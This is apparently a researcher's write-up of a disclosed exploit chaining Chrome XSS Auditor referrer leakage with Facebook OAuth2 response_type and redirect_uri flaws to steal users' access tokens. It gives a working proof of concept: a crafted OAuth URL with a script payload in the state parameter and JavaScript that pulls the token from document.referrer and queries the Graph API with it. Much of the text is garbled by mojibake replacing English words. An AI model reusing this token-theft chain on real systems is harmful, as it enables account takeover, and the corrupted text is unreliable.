How we Àڤ곫¤¯¡¿¥¿¥¯¥·¡¼¡¿ÉÔÀµ¥¢¥¯¥»¥¹d Facebook with OAuth2 and Chrome bugs

TL;DR We (me and @isciurus) chained several different bugs in Facebook, OAuth2 and Google Chrome to ¡Ê¼êÀè¤Î¡Ëµ»½Ñ an Íø±×¡¿¶½Ì£ing °Î¶È¡¿ÍøÍѤ¹¤ë. MalloryPage can ÆÀ¤ë your signed_request, code and ÀÜ¶á µ­Ç°ÉÊ for any client_id you °ÊÁ° ¸¢¸Â¤òÍ¿¤¨¤ëd on Facebook. The flow is ¤ä¤á¤ë Ê£»¨¤Ë¤¹¤ëd so let me explain the bugs we used.

1. in Google Chrome XSS Auditor, Ï³¤ì¤ëing Ê¸½ñ.referrer.
3 weeks ago I wrote ¸øɽ¡¤Ë½Ïª ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë on referrer ϳ¤ì for pages with X-XSS-Êݸî: '1;Êý¼°=Éõº¿¤¹¤ë'. Please read the ½é¤á¤Î ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë to understand how it ºîÉÊ. When Auditor Éõº¿¤¹¤ës page, it redirects to about:blank URL (about:blank always Á곤¹¤ës parent's origin). And we can Àܶá ʸ½ñ.referrer ´Þ¤à¡¿Éõ¤¸¹þ¤á¤ëing the previous URL Auditor just Éõº¿¤¹¤ëd. Facebook had '1; Êý¼°=Éõº¿¤¹¤ë' header. Now it's 0; because of us (Auditor is dangerous, new vulns will be ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ëd soon). Sadly, this bug Êó¹ð¡Ê¤¹¤ë¡Ë¡¿²±Â¬ was ¼¨¤¹d as sev=low by Chrome °ÂÁ´ team and no bounty ǧ¤á¤ëd.
It's not patched yet.

2. OAuth2 is... ¤ä¤á¤ë ´í¸±¤Ê auth ÏÈÁȤß. Gigantic attack surface, all parameters are passed in URL. I will Îá¾õ a separate ÃÏ°Ì¡¤Ç¤Ì¿¤¹¤ë about OAuth1 vs OAuth2 in a few weeks. ¶¼¤· Model is bigger than in ¸ø¼°¤Î¡¿Ìò¿Í docs.
In August 2012 I wrote a lot about ¤¢¤ê¤Õ¤ì¤¿ vulnerabilities-by-design and even Äó°Æ¤¹¤ëd to ľ¤¹¡¿Çã¼ý¤¹¤ë¡¤È¬É´Ä¹¤ò¤¹¤ë it: OAuth2.a.

We used 2 bugs: dynamic redirect_uri and dynamic response_type parameter.
response_type=code is the most °ÂÁ´¤Ê¡¦Êݾڤ¹¤ë authentication flow, because end »ÈÍÑ¼Ô never sees his access_token. But response_type is ´ðËÜŪ¤Ë a parameter in ¸¢¸Â¤òÍ¿¤¨¤ë URL. By ¼è¤Ã¤ÆÂå¤ï¤ëing response_type=code to response_type=µ­Ç°ÉÊ,signed_request we receive both µ­Ç°ÉÊ and code on our redirect_uri.

redirect_uri can be not only app's domain, but facebook.com domain is also µö¤¹d.
In our °Î¶È¡¿ÍøÍѤ¹¤ë we used response_type=µ­Ç°ÉÊ,signed_request&redirect_uri=FB_PATH where FB_PATH was a ÆÃ¤Ë ¡Ê¼êÀè¤Î¡Ëµ»½Ñd URL to ¸øɽ¤¹¤ë¡¿Ë½Ïª¤¹¤ë these values...

3. ¾ì½ê.hash ¸øɽ¡¤Ë½Ïª on facebook.com
For response_type=µ­Ç°ÉÊ provider sends an ÀÜ¶á µ­Ç°ÉÊ in ¾ì½ê fragment (aka ¾ì½ê.hash) to Èò¤±¤ë data ϳ¤ì¤ëing ·Ðͳ¤Ç referrers (¾ì½ê.hash is never sent in referrers)
@isciurus ÀßΩ¤¹¤ë a "bouncing" hashbang in September 2012. The trick was: facebook ½üµî¤¹¤ës '#' from URLs ´Þ¤à¡¿Éõ¤¸¹þ¤á¤ëing "#!" (AJAX google indexation trick) , it boils É餫¤¹¡¿·âÄƤ¹¤ë to copying ¾ì½ê.hash into URL and ¸øɽ¤¹¤ë¡¿Ë½Ïª¤¹¤ës ÀÜ¶á µ­Ç°ÉÊ in ʸ½ñ.referrer.
Later, in January he just ÀßΩ¤¹¤ë another bypass of "ľ¤¹¡¿Çã¼ý¤¹¤ë¡¤È¬É´Ä¹¤ò¤¹¤ëd" vulnerability, using %23 instead of #.

Here we go - PoC, look at the source code.

cut_me Custom Payload we used to make Auditor to Éõº¿¤¹¤ë the final page. We put it in the 'ÌÀ¸À¤¹¤ë¡¿¸øɽ¤¹¤ë' parameter (used to ˸¤²¤ë CSRF, you must know!)
target_app_id client_id we want to steal access_token and code from. In "real world" °Î¶È¡¿ÍøÍѤ¹¤ë we would use 100-200 most popular Facebook »ÈÍÑ¡¿Å¬ÍÑs and just gather all the ÍøÍѤǤ­¤ë µ­Ç°ÉÊs. It would be awesome.
sensitive_info - tampering of response_type parameter: signed_request and µ­Ç°ÉÊ are »äŪ¤Ê Info we are going to ϳ¤ì¤ë through ʸ½ñ.referrer
Now the final URL:
url = "http://www.facebook.com/dialog/oauth?client_id=" + target_app_id + "&response_type="+sensitive_info+"&ÄÄÎ󤹤롤ȯ´ø¤¹¤ë=Èó¡¤ÉÔ¡¤Ìµ&domain=facebook.com&origin=1&redirect_uri=http%3A%2F%2Ffacebook.com%2F%23%2521%2Fconnect%2Fxd_arbiter%23%21%2Ffind-friends%2Fbrowser%3Fcb%3Df3d2e47528%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff3ee4a8818%26domain%3Dfacebook.com%26relation%3Dparent%26state%3D"+cut_me+"&sdk=joey";

Value will look like:

http://www.facebook.com/dialog/oauth?client_id=111239619098&response_type=µ­Ç°ÉÊ%2Csigned_request&ÄÄÎ󤹤롤ȯ´ø¤¹¤ë=Èó¡¤ÉÔ¡¤Ìµ&domain=facebook.com&origin=1&redirect_uri=http%3A%2F%2Ffacebook.com%2F%23%2521%2Fconnect%2Fxd_arbiter%23%21%2Ffind-friends%2Fbrowser%3Fcb%3Df3d2e47528%26origin%3Dhttp%253A%252F%252Fdevelopers.facebook.com%252Ff3ee4a8818%26domain%3Dfacebook.com%26relation%3Dparent%26state%3D%3Cscript%3Evar%20bigPipe%20%3D%20new%20(Í׵᤹¤ë('BigPipe'))(%7B%22lid%22%3A0%2C%22forceFinish%22%3Atrue%7D)%3B%3C%2Fscript%3E&sdk=joey

Steps:

1) We open 25 windows (this is ºÇÂç¸Â ÎÌ of µö¤¹d windows in Chrome) with different target_app_id. Gotcha: Chrome DOES Ééô the URL even if it Éõº¿¤¹¤ës a window. This makes °Î¶È¡¿ÍøÍѤ¹¤ë even cooler: we open 25 windows, all of them are Éõº¿¤¹¤ëd but Ééôd, Auditor Éõº¿¤¹¤ës Custom Payload, we ÆÀ¤ë¡¤¤È¤é¤¨¤ë ʸ½ñ.referrer, »ÈÍÑ¼Ô is not ¶¼¤¹d at all.

2) If »ÈÍÑ¼Ô °ÊÁ° ¸¢¸Â¤òÍ¿¤¨¤ëd ³Î¤«¤Ê app_id he will be automatically redirected to
FB_PATH#...signed_request=SR&access_token=TOKEN&ÌÀ¸À¤¹¤ë¡¿¸øɽ¤¹¤ë=CUSTOM_PAYLOAD

3) Here Facebook javascript ½üµî¤¹¤ës '#' from the URL and redirects »ÈÍÑ¼Ô to another FB_PATH/...?signed_request=SR&access_token=TOKEN&ÌÀ¸À¤¹¤ë¡¿¸øɽ¤¹¤ë=CUSTOM_PAYLOAD

4) Now server Åú¤¨¤ë¡¿±þ¤¸¤ës with HTML page and
X-XSS-Êݸî: '1; Êý¼°=Éõº¿¤¹¤ë'
header.
Chrome XSS Auditor ¡Ê°­»ö¡¤ÈëÌ©¤Ê¤É¤ò¡Ëȯ¸«¤¹¤ës ÌÀ¸À¤¹¤ë¡¿¸øɽ¤¹¤ë=CUSTOM_PAYLOAD in HTML code of ÊÖÅú:
<script>var bigPipe = new (Í׵᤹¤ë('BigPipe'))({"lid":0,"forceFinish":true});</script>'
Éõº¿¤¹¤ës and redirects to about:blank

5) On MalloryPage we have setInterval which waits for ¾ì½ê.href=='about:blank'.
about:blank Á곤¹¤ës our MalloryPage origin - so we have Àܶá to ʸ½ñ.referrer. Final ·è¤Þ¤ê¤­¤Ã¤¿»Å»ö:

playground.¤Î¶á¤¯¤Ë();
clearInterval(int);
var ref = playground.ʸ½ñ.referrer;
window.µ­Ç°ÉÊ = ref.match(/µ­Ç°ÉÊ=([^\&]+)/)
if(window.µ­Ç°ÉÊ){
  window.µ­Ç°ÉÊ = window.µ­Ç°ÉÊ[1];
  ʸ½ñ.Îá¾õ('<script src="https://graph.facebook.com/me?callback=hello&access_token='+window.µ­Ç°ÉÊ+'"><'+'/script>');
}

var hello = µ¡Ç½¡Ê¤¹¤ë¡Ë¡¿¹Ô»ö(data){

  ·ÙÊó('Whats up '+data.»Ø̾¤¹¤ë+" your µ­Ç°ÉÊ is "+window.µ­Ç°ÉÊ);

}

Voila! Using this °Î¶È¡¿ÍøÍѤ¹¤ë we can ÆÀ¤ë code, signed_request and your access_token for any ¡ÊÊÛ¸î»Î¤Î¡Ë°ÍÍê¿Í.

After party.

We are splitting $2500 + $2500 bounty from Facebook and working on new attacks.

You really must check the coming soon article I Ìó«d to Îá¾õ in a few weeks, explaining how broken OAuth2 is.
For example, if you authenticate »ÈÍѼÔs with Facebook it means any XSS on your website can steal »ÈÍѼÔ's account. ¸½ºß¡¿°ìÈÌ¤Ë I'm discussing and Äó°Æ¤¹¤ëing new ways to Facebook °ÂÁ´ team how to °·¤¦ it and make response_type=code more °ÂÁ´¤Ê¡¦Êݾڤ¹¤ë, because they are the biggest provider and their ·èÄ꡿ȽÄ꾡¤Á¡Ê¤¹¤ë¡Ës »öÊÁ. If we don't ľ¤¹¡¿Çã¼ý¤¹¤ë¡¤È¬É´Ä¹¤ò¤¹¤ë it - it's The Road To Hell!

By the way there is another sev=medium vulnerability in Chrome Auditor, will be published as soon as it will be patched :)

HN/reddit